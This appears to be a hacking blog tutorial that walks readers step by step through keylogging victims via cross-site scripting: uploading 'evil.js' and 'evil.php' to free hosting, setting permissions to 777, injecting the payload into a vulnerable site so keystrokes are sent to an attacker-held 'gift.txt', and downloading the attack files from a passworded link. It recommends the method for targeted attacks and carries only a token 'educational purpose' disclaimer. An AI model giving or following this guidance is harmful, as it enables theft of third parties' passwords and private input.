Today I am going to show you how to keylog someone just by XSS. Keep in mind that you need to have a XSS vulnerable target and XSS knowledge in order to perform this kind of "attack".
I have explained what XSS in one of my previous tutorials so I am not gonna explain now how to check a website for XSS vulnerabilities etc.
Make sure to check it if you have something unclear about XSS.
Note: This is for educational purpose only ! ! !
First we need a web hosting because we are going to upload our evil php & js files. ( You will find the download Link at the end of the thread )
I suggest you to use 1freehosting which in my opinion it's one of the best free hostings out there.
Now you have to edit the evil.js the url inside the file to be the url to the php logger script. The javascript is the file we will insert in the evil url and keylog the victim, it will then send them to the php script on our host that will write the keystrokes on our gift.txt file.
Right Click > Edit and this will appear:
You have to change the yellow part to your php logger script and then save the file.
Now we need to edit the evil.php file so we will decide where keylogs to be written, in this case I will use gift.txt
Right Click > Edit and you will see this:
You can rename the yellow part which is gift.txt to anything you want.
Ok now upload the files you just downloaded on you web hosting , keep in mind that all the files need to be in the same folder.
Create a new file on you web hosting named gift.txt(in my case) which will be the destination where keylogs gonna end up.
NOTE: Dont forget to set the permissions of all the files ( evil.js , evil.php , gift.txt ) to 777 ! (You can do it on FileZilla easily just by right clicking on the file then File permission and set it to 777 like the image below:
Ok , now we have setup everything we need to perform this attack, all we have to do now is create our evil payload and send to the victim.
This is how it looks after I have inserted my XSS Payload on the website, from this moment the victim is keylogged !
Now that we are keyloggin the victim , (In this case the victim is me as I have opened the evil url to show you how it looks) let's try to write something to see if we will recieve anything on our gift.txt file which we have put on our hosting website. I.E Let's write "I LOVE HH" on the search box like on the image:
Now let's check gift.txt
And here it is !! Every key is recorded perfectly in our gift.txt file !
Download Evil.php & Evil.js: http://www.files.com/shared/528c7989ecaba/Gaara.rar.
File passcode:gaara
This is recomended for targeted attacts as if you will spread it in mass the logs might end up in mess. The keyloggin process will hapen for as long as the victim wont leave the page, after that it wont work anymore.
Hopefully you have learnt smth new from this tutorial which gonna help you understand better how XSS works.
If you need help , feel free to PM or to leave a comment.
Greets,
0 Comments:
Post a Comment